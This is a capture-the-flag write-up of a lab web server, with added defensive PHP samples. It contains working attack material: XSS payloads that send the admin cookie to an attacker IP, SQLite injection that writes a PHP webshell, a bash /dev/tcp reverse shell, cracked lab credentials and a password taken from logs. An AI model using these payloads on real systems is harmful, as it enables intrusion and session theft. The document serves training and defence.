Phase 1: Reconnaissance
nmap finds ports 22 and 80 open:
oxdf@hacky$ nmap -p- --min-rate 10000 10.10.11.53
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-03 14:39 EST
Nmap scan report for 10.10.11.53
Host is up (0.086s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
Nmap done: 1 IP address (1 host up) scanned in 6.85 seconds
oxdf@hacky$ nmap -p 22,80 -sCV 10.10.11.53
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-03 14:39 EST
Nmap scan report for 10.10.11.53
Host is up (0.085s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 96:2d:f5:c6:f6:9f:59:60:e5:65:85:ab:49:e4:76:14 (RSA)
| 256 9e:c4:a4:40:e9:da:cc:62:d1:d6:5a:2f:9e:7b:d4:aa (ECDSA)
|_ 256 6e:22:2a:6a:6d:eb:de:19:b7:16:97:c2:7e:89:29:d5 (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Did not follow redirect to http://cat.htb/
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.67 seconds
Add the domain to the hosts file.
Scan the domain name with nmap again to see what else turns up:
oxdf@hacky$ nmap -p 80 -sCV cat.htb
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-03 15:54 EST
Nmap scan report for cat.htb (10.10.11.53)
Host is up (0.085s latency).
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Best Cat Competition
| http-git:
| 10.10.11.53:80/.git/
| Git repository found!
| Repository description: Unnamed repository; edit this file 'description' to name the...
|_ Last commit message: Cat v1
|_http-server-header: Apache/2.4.41 (Ubuntu)
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.81 seconds
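nmap found a Git repository at 10.10.11.53:80/.git/
Port 80
The Vote page shows that voting has closed:
/register and /login handle registration and login; once logged in, a cat entry can be submitted:
After a successful submission the page shows:
The site is clearly PHP. In Burp, the HTTP response headers for the first GET request are: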
HTTP/1.1 200 OK
Date: Mon, 03 Feb 2025 20:29:30 GMT
Server: Apache/2.4.41 (Ubuntu)
Set-Cookie: PHPSESSID=h9rs7gar88khrprp3n47ngnahv; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 3075
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
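The developer tools show the cookie details; it is not HttpOnly:
When a cookie lacks the HttpOnly attribute, an attacker who can inject malicious JavaScript (for example through a comment box, a form, or another input point) can read the cookie directly through document.cookie.
Consequence: a stolen cookie may contain sensitive information (such as a session ID), letting the attacker impersonate the user.
Best practice: always set HttpOnly on sensitive cookies (session IDs, tokens), and combine it with the other security attributes:
·Secure: the cookie is sent over HTTPS only.
·SameSite: restricts sending the cookie with cross-site requests (defends against CSRF).
·Avoid storing sensitive data in cookies on the front end; use localStorage or sessionStorage where necessary (but mind the XSS risk).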
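Added example, not part of the original write-up or the application's code: a check that reports which of the attributes above are missing from a Set-Cookie header, run on the header the site returned, plus the PHP session settings that emit them. The function names and the hardened header are constructed for illustration.

```php
<?php
// Added example: audit a Set-Cookie header for HttpOnly / Secure / SameSite.

function missing_cookie_attributes(string $header): array {
    // Strip the field name, then split "name=value; attr; attr=value".
    $value = preg_replace('/^Set-Cookie:\s*/i', '', trim($header));
    $parts = array_map('trim', explode(';', $value));
    array_shift($parts);                          // drop the name=value pair
    $present = [];
    foreach ($parts as $attr) {
        if ($attr === '') {
            continue;
        }
        [$name] = explode('=', $attr, 2);         // attribute names are case-insensitive
        $present[strtolower(trim($name))] = true;
    }
    $missing = [];
    foreach (['httponly' => 'HttpOnly', 'secure' => 'Secure', 'samesite' => 'SameSite'] as $key => $label) {
        if (!isset($present[$key])) {
            $missing[] = $label;
        }
    }
    return $missing;
}

// Settings that make PHP emit the hardened cookie; call before any output.
// Array form needs PHP 7.3+. 'secure' only makes sense once the site is served over HTTPS.
function start_hardened_session(): void {
    session_set_cookie_params([
        'lifetime' => 0, 'path' => '/', 'secure' => true, 'httponly' => true, 'samesite' => 'Lax',
    ]);
    session_start();
}

// Header as returned by the site in the response shown above.
$observed = 'Set-Cookie: PHPSESSID=h9rs7gar88khrprp3n47ngnahv; path=/';
// Constructed header: the same cookie after hardening.
$hardened = 'Set-Cookie: PHPSESSID=h9rs7gar88khrprp3n47ngnahv; path=/; Secure; HttpOnly; SameSite=Lax';

echo 'observed is missing: ', implode(', ', missing_cookie_attributes($observed)) ?: 'nothing', "\n";
echo 'hardened is missing: ', implode(', ', missing_cookie_attributes($hardened)) ?: 'nothing', "\n";
```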
Next, look at the 404 page:
Directory brute force
Use feroxbuster to find which other paths are reachable:
oxdf@hacky$ feroxbuster -u http://cat.htb -x php
___ ___ __ __ __ __ __ ___
|__ |__ |__) |__) | / ` / \ \_/ | | \ |__
| |___ | \ | \ | \__, \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓 ver: 2.11.0
───────────────────────────┬──────────────────────
🎯 Target Url │ http://cat.htb
🚀 Threads │ 50
📖 Wordlist │ /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt
👌 Status Codes │ All Status Codes!
💥 Timeout (secs) │ 7
🦡 User-Agent │ feroxbuster/2.11.0
🔎 Extract Links │ true
💲 Extensions │ [php]
🏁 HTTP methods │ [GET]
🔃 Recursion Depth │ 4
───────────────────────────┴──────────────────────
🏁 Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
403 GET 9l 28w 272c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
404 GET 9l 31w 269c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
200 GET 140l 327w 4004c http://cat.htb/join.php
200 GET 127l 270w 2900c http://cat.htb/css/styles.css
301 GET 9l 28w 304c http://cat.htb/uploads => http://cat.htb/uploads/
200 GET 1l 0w 1c http://cat.htb/config.php
302 GET 1l 0w 1c http://cat.htb/admin.php => http://cat.htb/join.php
302 GET 0l 0w 0c http://cat.htb/logout.php => http://cat.htb/
200 GET 129l 285w 3075c http://cat.htb/index.php
301 GET 9l 28w 300c http://cat.htb/css => http://cat.htb/css/
302 GET 1l 0w 1c http://cat.htb/contest.php => http://cat.htb/join.php
200 GET 41l 83w 1242c http://cat.htb/vote.php
301 GET 9l 28w 300c http://cat.htb/img => http://cat.htb/img/
200 GET 196l 415w 5082c http://cat.htb/winners.php
200 GET 129l 285w 3075c http://cat.htb/
200 GET 127l 270w 2900c http://cat.htb/css/styles
200 GET 127l 715w 53503c http://cat.htb/img/cat3.webp
200 GET 304l 1647w 132808c http://cat.htb/img/cat1.jpg
200 GET 904l 5604w 448419c http://cat.htb/img/cat2.png
301 GET 9l 28w 304c http://cat.htb/winners => http://cat.htb/winners/
200 GET 127l 715w 53503c http://cat.htb/img_winners/cat3.webp
200 GET 304l 1647w 132808c http://cat.htb/img_winners/cat1.jpg
200 GET 904l 5604w 448419c http://cat.htb/img_winners/cat2.png
200 GET 304l 1647w 132808c http://cat.htb/img/cat1
[####################] - 4m 150022/150022 0s found:22 errors:437
[####################] - 3m 30000/30000 150/s http://cat.htb/
[####################] - 3m 30000/30000 153/s http://cat.htb/uploads/
[####################] - 3m 30000/30000 156/s http://cat.htb/css/
[####################] - 3m 30000/30000 151/s http://cat.htb/img/
[####################] - 3m 30000/30000 167/s http://cat.htb/winners/
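A few paths are worth noting:
/admin.php just redirects back to the login/registration page.
/uploads (which redirects to /uploads/) returns 403 Forbidden; this may be where uploaded images are stored. I tried requesting /uploads/[png filename], but it returned 404 Not Found.
Somewhat oddly, both /img and /img_winners exist, and requesting either returns 403. The same goes for /winners.
Beyond that, the .git repository can also be downloaded.
.Git
Download it with git-dumper: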
oxdf@hacky$ git-dumper http://cat.htb/.git git
Restore the working tree with git checkout .:
oxdf@hacky$ git checkout .
Updated 19 paths from the index
oxdf@hacky$ ls
accept_cat.php admin.php config.php contest.php css delete_cat.php img img_winners index.php join.php logout.php view_cat.php vote.php winners winners.php
Check the commit log:
oxdf@hacky$ git log
commit 8c2c2701eb4e3c9a42162cfb7b681b6166287fd5 (HEAD -> master)
Author: Axel <axel2017@gmail.com>
Date: Sat Aug 31 23:26:14 2024 +0000
Cat v1
config.php
Look at the config.php that was just downloaded:
<?php
// Database configuration
$db_file = '/databases/cat.db';
// Connect to the database
try {
$pdo = new PDO("sqlite:$db_file");
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
} catch (PDOException $e) {
die("Error: " . $e->getMessage());
}
?>
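This reveals a SQLite database at /databases/cat.db. Because it is SQLite, no username or password is needed to connect.
contest.php
This page handles users submitting cats to the contest. The source contains a check for forbidden characters: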
if ($_SERVER["REQUEST_METHOD"] == "POST") {
// Capture form data
$cat_name = $_POST['cat_name'];
$age = $_POST['age'];
$birthdate = $_POST['birthdate'];
$weight = $_POST['weight'];
$forbidden_patterns = "/[+*{}',;<>()\\[\\]\\/\\:]/";
// Check for forbidden content
if (contains_forbidden_content($cat_name, $forbidden_patterns) ||
contains_forbidden_content($age, $forbidden_patterns) ||
contains_forbidden_content($birthdate, $forbidden_patterns) ||
contains_forbidden_content($weight, $forbidden_patterns)) {
$error_message = "Your entry contains invalid characters.";
} else {
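If every input passes validation, the application generates a random name for the image and checks the following conditions:
the file is a valid image, the file extension is allowed, the file size is within the limit, and the file name does not already exist on the system.
If all of them hold, the data is written to the database.
admin.php
It first checks that the username is axel: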
if (!isset($_SESSION['username']) || $_SESSION['username'] !== 'axel') {
header("Location: /join.php");
exit();
}
It then fetches every row from the cats table:
$stmt = $pdo->prepare("SELECT * FROM cats");
$stmt->execute();
$cats = $stmt->fetchAll(PDO::FETCH_ASSOC);
?>
view_cat.php
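There is also a view_cat.php page (linked from the admin interface), accessible only to the axel user, that shows a cat's details.
accept_cat.php
On admin.php, the administrator can approve or delete cat submissions through links. Clicking the "Accept" button sends a request to accept_cat.php. The script first performs these checks:
the current user is axel
the request method is POST
the parameters are set: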
<?php
include 'config.php';
session_start();
if (isset($_SESSION['username']) && $_SESSION['username'] === 'axel') {
if ($_SERVER["REQUEST_METHOD"] == "POST") {
if (isset($_POST['catId']) && isset($_POST['catName'])) {
...[snip]...
} else {
echo "Error: Cat ID or Cat Name not provided.";
}
} else {
header("Location: /");
exit();
}
} else {
echo "Access denied.";
}
?>
The script then takes the cat's ID and name, inserts the cat into the accepted_cats table, and removes the record from the original cats table:
$cat_name = $_POST['catName'];
$catId = $_POST['catId'];
$sql_insert = "INSERT INTO accepted_cats (name) VALUES ('$cat_name')";
$pdo->exec($sql_insert);
$stmt_delete = $pdo->prepare("DELETE FROM cats WHERE cat_id = :cat_id");
$stmt_delete->bindParam(':cat_id', $catId, PDO::PARAM_INT);
$stmt_delete->execute();
echo "The cat has been accepted and added successfully.";
catName here is the only place in the whole code base where $pdo->exec is used directly on a raw string, so it is worth testing for injection.
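Added example, not part of the original write-up or the application's code: the INSERT from accept_cat.php run two ways against an in-memory SQLite database, once with string concatenation and exec() as above and once with a bound parameter. The helper names, the minimal table layout and the input string are constructed for the demonstration.

```php
<?php
// Added example: concatenation + exec() versus prepare() + bound value.

function make_db(): PDO {
    $pdo = new PDO('sqlite::memory:');
    $pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    $pdo->exec('CREATE TABLE accepted_cats (name TEXT)');
    return $pdo;
}

// Same pattern as accept_cat.php: the request value becomes part of the SQL text.
// exec() on SQLite runs every statement in the string, so stacked statements execute.
function accept_vulnerable(PDO $pdo, string $cat_name): void {
    $pdo->exec("INSERT INTO accepted_cats (name) VALUES ('$cat_name')");
}

// Hardened: the value is bound as data and never reaches the SQL parser.
function accept_hardened(PDO $pdo, string $cat_name): void {
    $stmt = $pdo->prepare('INSERT INTO accepted_cats (name) VALUES (:name)');
    $stmt->bindValue(':name', $cat_name, PDO::PARAM_STR);
    $stmt->execute();
}

function table_names(PDO $pdo): array {
    return $pdo->query("SELECT name FROM sqlite_master WHERE type = 'table' ORDER BY name")
               ->fetchAll(PDO::FETCH_COLUMN);
}

// Constructed input: closes the string and the VALUES list, then stacks a harmless
// CREATE TABLE so the effect is visible in sqlite_master.
$input = "muffins'); CREATE TABLE injected (x TEXT);-- -";

$a = make_db();
accept_vulnerable($a, $input);
echo 'exec + concatenation, tables: ', implode(', ', table_names($a)), "\n";

$b = make_db();
accept_hardened($b, $input);
echo 'prepare + bind, tables:       ', implode(', ', table_names($b)), "\n";
echo 'prepare + bind, stored name:  ', $b->query('SELECT name FROM accepted_cats')->fetchColumn(), "\n";
```

With the bound parameter the whole input is stored as the cat's name and no second table appears; the DELETE in accept_cat.php already uses this form.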
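Phase 2: Exploitation
XSS
Logically, the administrator probably reviews submitted cat entries to decide whether to approve them. Before analysing the source, I first tried injecting HTML/XSS test strings into each field of the contest form; the result was:
This matches the earlier observation: any input containing one of the characters [+*{}',;<>()\\[\\]\\/\\:] should be rejected.
XSS bypass
There are two ways to bypass this filter and steal the administrator's cookie:
First: inject a standard XSS payload into the username field.
Second: use HTML injection, using the " character to inject HTML-encoded JavaScript (with the ; removed) into the onerror attribute.
Method 1: XSS via the username
Even without reading the source, it is reasonable to guess that the username is echoed back when the administrator reviews cat submissions. Since I did not supply a username when submitting the form, it is taken from the session.
The source code confirms this. So I registered a user named: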
0xdf<script>var i = new Image(); i.src="http://10.10.14.6/?c=" + document.cookie;</script>
Then I submitted a cat entry, which injected the script into the page. A few seconds later:
10.10.11.53 - - [03/Feb/2025 17:41:14] "GET /?c=PHPSESSID=vakha8c53alin8oq8350imggf0 HTTP/1.1" 200 -
The cookie is captured.
Method 2: HTML injection
The double quote " is not in the filter's blacklist. admin.php contains an <img> tag:
<img src="<?php echo htmlspecialchars($cat['photo_path']); ?>"
alt="<?php echo htmlspecialchars($cat['cat_name']); ?>"
class="cat-photo">
Here the value of $cat['photo_path'] cannot be controlled, but $cat['cat_name'] can (as long as it passes the blacklist filter).
If I set cat_name to:
alt" onerror="" oxdf="
the resulting <img> tag becomes:
<img src="[photo_path]" alt="alt" onerror="" oxdf="" class="cat-photo">
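As long as the image fails to load, the code in onerror runs.
The question now is how to build valid JavaScript without characters such as (, ), ; and '.
Inside an onerror attribute, the browser decodes HTML-encoded strings before running them as JavaScript, and this works even when the semicolon ; is omitted!
For local testing, create an index.html file: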
<html>
<head>
</head>
<body>
<img src="x" onerror="alert(1);" />
</body>
</html>
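Although the semicolons (;) are omitted in the code, the HTML-encoded string in onerror is still decoded and executed, equivalent to running alert(1).
Opening the page in Firefox triggers the pop-up:
The test works. Since neither & nor # is filtered, we can construct: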
var i = new Image(); i.src="http://10.10.14.6/?c=" + document.cookie
HTML-encoded:
var i = new Image(); i.src="http://10.10.14.6/?c=" + document.cookie
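Paste it into onerror.
First submit a normal cat entry and intercept the request in Burp Repeater. Then replace the cat name (cat_name) with the HTML-entity-encoded XSS payload and adjust the image file: keep the PNG file header valid (magic bytes: ‰PNG) so the server-side check passes, but make the image fail to load in Firefox so that onerror runs the script.
The cookie arrives: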
10.10.11.53 - - [03/Feb/2025 18:17:52] "GET /?c=PHPSESSID=akukm6g15pek4m46n9ut8uu14a HTTP/1.1" 200 -
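SQL injection
1. Obtaining administrator access
With the stolen administrator cookie, admin.php becomes accessible. To test, I submitted a new cat entry from another browser and confirmed that it shows up in the admin panel:
2. Testing the accept path for SQL injection
The SQL injection found earlier is in the cat review function (accept_cat.php). After clicking the "Accept" button:
3. Building a SQL injection proof of concept (PoC)
Send the accept request to Burp Repeater and insert a single quote ' into the name parameter to test:
The system is known to use a SQLite database, which means stacked queries may be supported.
4. Implementing the file write
Following the SQLite injection approach from PayloadsAllTheThings, build a payload that writes a webshell: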
ATTACH DATABASE '/var/www/lol.php' AS lol;
CREATE TABLE lol.pwn (dataz text);
INSERT INTO lol.pwn (dataz) VALUES ("<?php system($_GET['cmd']); ?>");--
The original query has to be closed first:
muffins'); ATTACH DATABASE '/var/www/0xdf.php' as db; CREATE TABLE db.pwn (stuff text); INSERT INTO db.pwn (stuff) VALUES ("test");-- -
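After URL encoding:
The path may be wrong; switch to a relative path:
Success.
Switch to the webshell:
Pass a Bash reverse shell as the command to the webshell to get interactive access to the server. Once the basic shell is up, upgrade it to a fully functional TTY shell: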
http://....php?cmd=bash%20-i%20%3E%26%20/dev/tcp/10.0.0.1/4444%200%3E%261
www-data@cat:/var/www/cat.htb$ script /dev/null -c bash
script /dev/null -c bash
Script started, file is /dev/null
www-data@cat:/var/www/cat.htb$ ^Z
[1]+ Stopped nc -lnvp 444
oxdf@hacky$ stty raw -echo; fg
nc -lnvp 444
reset
reset: unknown terminal type unknown
Terminal type? screen
www-data@cat:/var/www/cat.htb$
This gives access as the www-data user.
Phase 3: Privilege Escalation
www-data@cat:/home$ ls
axel git jobert rosa
www-data@cat:/home$ cat /etc/passwd | grep "sh$"
root:x:0:0:root:/root:/bin/bash
axel:x:1000:1000:axel:/home/axel:/bin/bash
rosa:x:1001:1001:,,,:/home/rosa:/bin/bash
git:x:114:119:Git Version Control,,,:/home/git:/bin/bash
jobert:x:1002:1002:,,,:/home/jobert:/bin/bash
The web directory layout is exactly what I found earlier. The database is in the /databases directory, and now I can access it directly:
www-data@cat:/databases$ sqlite3 cat.db
SQLite version 3.31.1 2020-01-27 19:55:54
Enter ".help" for usage hints.
sqlite> .tables
accepted_cats cats users
sqlite> .headers on
sqlite> select * from users;
user_id|username|email|password
1|axel|axel2017@gmail.com|d1bbba3670feb9435c9841e46e60ee2f
2|rosa|rosamendoza485@gmail.com|ac369922d560f17d6eeb8b2c7dec498c
3|robert|robertcervantes2000@gmail.com|42846631708f69c00ec0c0a8aa4a92ad
4|fabian|fabiancarachure2323@gmail.com|39e153e825c4a3d314a0dc7f7475ddbe
5|jerryson|jerrysonC343@gmail.com|781593e060f8d065cd7281c5ec5b4b86
6|larry|larryP5656@gmail.com|1b6dce240bbfbc0905a664ad199e18f8
7|royer|royer.royer2323@gmail.com|c598f6b844a36fa7836fba0835f1f6
8|peter|peterCC456@gmail.com|e41ccefa439fc454f7eadbf1f139ed8a
9|angel|angel234g@gmail.com|24a8ec003ac2e1b3c5953a6f95f8f565
10|jobert|jobert2020@gmail.com|88e4dceccd48820cf77b5cf6c08698ad
11|0xdf|0xdf@cat.htb|465e929fc1e0853025faad58fc8cb47d
These are 32-character hex strings, and join.php confirms the format:
if ($_SERVER["REQUEST_METHOD"] == "GET" && isset($_GET['registerForm'])) {
$username = $_GET['username'];
$email = $_GET['email'];
$password = md5($_GET['password']);
Look the hashes up on CrackStation (online password hash cracking: MD5, SHA1, Linux, rainbow tables, etc.).
One password is recovered: rosa:soyunapeincesarosa
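Added example, not part of the original write-up or the application's code: replacing the md5() call in join.php with password_hash(), and upgrading rows that still hold an unsalted MD5 at the next successful login. The function names, the sample account and its password are constructed.

```php
<?php
// Added example: migrate unsalted MD5 password storage to password_hash().

function register_hash(string $password): string {
    // PASSWORD_DEFAULT is salted and deliberately slow, so a lookup table does not help.
    return password_hash($password, PASSWORD_DEFAULT);
}

// Returns [ok, newHash]; newHash is non-null when the stored value should be replaced.
function verify_and_upgrade(string $password, string $stored): array {
    $is_legacy_md5 = (bool) preg_match('/^[0-9a-f]{32}$/', $stored);
    if ($is_legacy_md5) {
        // Constant-time comparison against the legacy format, then upgrade on success.
        $ok = hash_equals($stored, md5($password));
        return [$ok, $ok ? register_hash($password) : null];
    }
    $ok = password_verify($password, $stored);
    $needs = $ok && password_needs_rehash($stored, PASSWORD_DEFAULT);
    return [$ok, $needs ? register_hash($password) : null];
}

// Constructed account whose row still holds the legacy MD5 of a sample password.
$sample = 'correct horse battery staple';
$row = ['username' => 'demo', 'password' => md5($sample)];

[$ok, $new] = verify_and_upgrade($sample, $row['password']);
if ($ok && $new !== null) {
    $row['password'] = $new;            // in the application: UPDATE with a bound parameter
}
echo 'first login ok:      ', var_export($ok, true), "\n";
echo 'row upgraded:        ', var_export(!preg_match('/^[0-9a-f]{32}$/', $row['password']), true), "\n";

[$ok2, $new2] = verify_and_upgrade($sample, $row['password']);
echo 'second login ok:     ', var_export($ok2, true), "\n";
echo 'rehash needed again: ', var_export($new2 !== null, true), "\n";

[$bad] = verify_and_upgrade('wrong password', $row['password']);
echo 'wrong password ok:   ', var_export($bad, true), "\n";
```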
su - rosa
www-data@cat:/var/www$ su - rosa
Password:
rosa@cat:~$
SSH works as well.
rosa is a member of the adm group:
rosa@cat:~$ id
uid=1001(rosa) gid=1001(rosa) groups=1001(rosa),4(adm)
Find all files and directories that belong to the adm group:
rosa@cat:~$ find / -group adm 2>/dev/null
/var/log/audit
/var/log/audit/audit.log
/var/log/audit/audit.log.4
/var/log/audit/audit.log.1
/var/log/audit/audit.log.3
/var/log/audit/audit.log.2
/var/log/syslog.2.gz
/var/log/syslog.1
/var/log/apt/term.log.2.gz
/var/log/apt/term.log.5.gz
/var/log/apt/term.log.4.gz
/var/log/apt/term.log.6.gz
/var/log/apt/term.log.3.gz
/var/log/apt/term.log
/var/log/apt/term.log.1.gz
/var/log/auth.log.1
/var/log/kern.log.1
/var/log/dmesg
/var/log/apache2
/var/log/apache2/access.log
/var/log/apache2/access.log.2.gz
/var/log/apache2/error.log.1
/var/log/apache2/error.log
/var/log/apache2/access.log.3.gz
/var/log/apache2/error.log.2.gz
/var/log/apache2/other_vhosts_access.log
/var/log/apache2/access.log.1
/var/log/apache2/error.log.3.gz
/var/log/kern.log
/var/log/installer
/var/log/installer/subiquity-server-info.log.2098
/var/log/installer/subiquity-server-debug.log.2098
/var/log/installer/installer-journal.txt
/var/log/installer/subiquity-curtin-install.conf
/var/log/installer/subiquity-client-info.log.2048
/var/log/installer/autoinstall-user-data
/var/log/installer/subiquity-curtin-apt.conf
/var/log/installer/subiquity-client-debug.log.2048
/var/log/mail.log
/var/log/mail.log.1
/var/log/syslog.3.gz
/var/log/cloud-init.log
/var/log/syslog
/var/log/cloud-init-output.log
/var/log/auth.log
/var/spool/rsyslog
/etc/hostname
/etc/cloud/cloud.cfg.d/99-installer.cfg
/etc/cloud/ds-identify.cfg
/etc/hosts
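Apache's access log (access.log) records every page request. While analysing the registration and login flow, it stands out that both are implemented with GET requests, which is clearly a very insecure practice.
And that turns out to be the attack path. /var/log/apache2/access.log shows a login request from the user axel being logged roughly every 10 seconds: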
127.0.0.1 - - [04/Feb/2025:02:20:11 +0000] "GET /join.php?loginUsername=axel&loginPassword=aNdZwgC4tI9gnVXv_e3Q&loginForm=Login HTTP/1.1" 302 329 "http://cat.htb/join.php" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:134.0) Gecko/20100101 Firefox/134.0"
This reveals axel's password.
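Added example, not part of the original write-up: a scan of Apache access-log lines for credential-like query parameters such as the loginPassword seen above, with a redacted copy of each flagged line. The log line is constructed with a placeholder password, and the parameter-name pattern is an assumption to tune per application.

```php
<?php
// Added example: find and redact credentials that were logged because a form used GET.

const SECRET_PARAM = '/pass|pwd|token|secret/i';   // assumed list of sensitive parameter names

// Returns the raw names of query parameters in the request line that look like secrets.
function secret_params_in_line(string $line): array {
    // Request field of the combined log format: "METHOD /path?query HTTP/x.y"
    if (!preg_match('/"[A-Z]+ (\S+) HTTP\/[\d.]+"/', $line, $m)) {
        return [];
    }
    $query = parse_url($m[1], PHP_URL_QUERY);
    if (!is_string($query)) {
        return [];
    }
    $hits = [];
    foreach (explode('&', $query) as $pair) {
        $name = explode('=', $pair, 2)[0];
        if ($name !== '' && preg_match(SECRET_PARAM, urldecode($name))) {
            $hits[] = $name;
        }
    }
    return $hits;
}

// Replaces the value of every flagged parameter wherever it occurs in the line
// (request field and Referer), so the line can be retained without the secret.
function redact_line(string $line): string {
    foreach (secret_params_in_line($line) as $name) {
        $pattern = '/([?&]' . preg_quote($name, '/') . '=)[^&\s"]*/';
        $line = preg_replace($pattern, '${1}[REDACTED]', $line);
    }
    return $line;
}

// Constructed log line in the same format as the one above; the password is a placeholder.
$sample = '127.0.0.1 - - [04/Feb/2025:02:20:11 +0000] '
        . '"GET /join.php?loginUsername=demo&loginPassword=EXAMPLE-PASSWORD&loginForm=Login HTTP/1.1" '
        . '302 329 "http://cat.htb/join.php" "Mozilla/5.0"';

echo 'flagged parameters: ', implode(', ', secret_params_in_line($sample)) ?: 'none', "\n";
echo redact_line($sample), "\n";
```

Redaction only cleans up what is already logged; the fix on the application side is to submit the login and registration forms with POST so the credentials never reach the request line.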
su - axel
rosa@cat:~$ su - axel
Password:
axel@cat:~$ cat user.txt
78087ea7************************
Phase 4: Further Reconnaissance
Check the listening ports:
axel@cat:~$ netstat -tnl
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address Foreign Address State
tcp 0 0 127.0.0.53:53 0.0.0.0:* LISTEN
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN
tcp 0 0 127.0.0.1:3000 0.0.0.0:* LISTEN
tcp 0 0 127.0.0.1:40601 0.0.0.0:* LISTEN
tcp 0 0 127.0.0.1:25 0.0.0.0:* LISTEN
tcp 0 0 127.0.0.1:54203 0.0.0.0:* LISTEN
tcp 0 0 127.0.0.1:587 0.0.0.0:* LISTEN
tcp 0 0 127.0.0.1:41135 0.0.0.0:* LISTEN
tcp6 0 0 :::22 :::* LISTEN
tcp6 0 0 :::80 :::* LISTEN
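Port | Protocol | Bind address | Service / purpose | Risk level |
---|---|---|---|---|
53 | TCP | 127.0.0.53 | DNS resolution (systemd-resolved) | Low (local only) |
22 | TCP | 0.0.0.0 & ::: | SSH service | Medium (needs hardening when exposed publicly) |
3000 | TCP | 127.0.0.1 | Local development service (e.g. Node.js) | Low (local only) |
25 | TCP | 127.0.0.1 | SMTP (local mail service) | Low (local only) |
587 | TCP | 127.0.0.1 | Mail submission port (MSA) | Low (local only) |
Mail
The /var/spool/mail directory holds mailboxes for three users: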
axel@cat:/var/spool/mail$ ls
axel jobert root
axel's mailbox contains messages from rosa:
From rosa@cat.htb Sat Sep 28 04:51:50 2024
Return-Path: <rosa@cat.htb>
Received: from cat.htb (localhost [127.0.0.1])
by cat.htb (8.15.2/8.15.2/Debian-18) with ESMTP id 48S4pnXk001592
for <axel@cat.htb>; Sat, 28 Sep 2024 04:51:50 GMT
Received: (from rosa@localhost)
by cat.htb (8.15.2/8.15.2/Submit) id 48S4pnlT001591
for axel@localhost; Sat, 28 Sep 2024 04:51:49 GMT
Date: Sat, 28 Sep 2024 04:51:49 GMT
From: rosa@cat.htb
Message-Id: <202409280451.48S4pnlT001591@cat.htb>
Subject: New cat services
Hi Axel,
We are planning to launch new cat-related web services, including a cat care website and other projects. Please send an email to jobert@localhost with information about your Gitea repository. Jobert will check if it is a promising service that we can develop.
Important note: Be sure to include a clear description of the idea so that I can understand it properly. I will review the whole repository.
From rosa@cat.htb Sat Sep 28 05:05:28 2024
Return-Path: <rosa@cat.htb>
Received: from cat.htb (localhost [127.0.0.1])
by cat.htb (8.15.2/8.15.2/Debian-18) with ESMTP id 48S55SRY002268
for <axel@cat.htb>; Sat, 28 Sep 2024 05:05:28 GMT
Received: (from rosa@localhost)
by cat.htb (8.15.2/8.15.2/Submit) id 48S55Sm0002267
for axel@localhost; Sat, 28 Sep 2024 05:05:28 GMT
Date: Sat, 28 Sep 2024 05:05:28 GMT
From: rosa@cat.htb
Message-Id: <202409280505.48S55Sm0002267@cat.htb>
Subject: Employee management
We are currently developing an employee management system. Each sector administrator will be assigned a specific role, while each employee will be able to consult their assigned tasks. The project is still under development and is hosted in our private Gitea. You can visit the repository at: http://localhost:3000/administrator/Employee-management/. In addition, you can consult the README file, highlighting updates and other important details, at: http://localhost:3000/administrator/Employee-management/raw/branch/main/README.md.
There is an employee management system at: http://localhost:3000/administrator/Employee-management/
Reach it through SSH local port forwarding: ssh -L 3000:localhost:3000
To be continued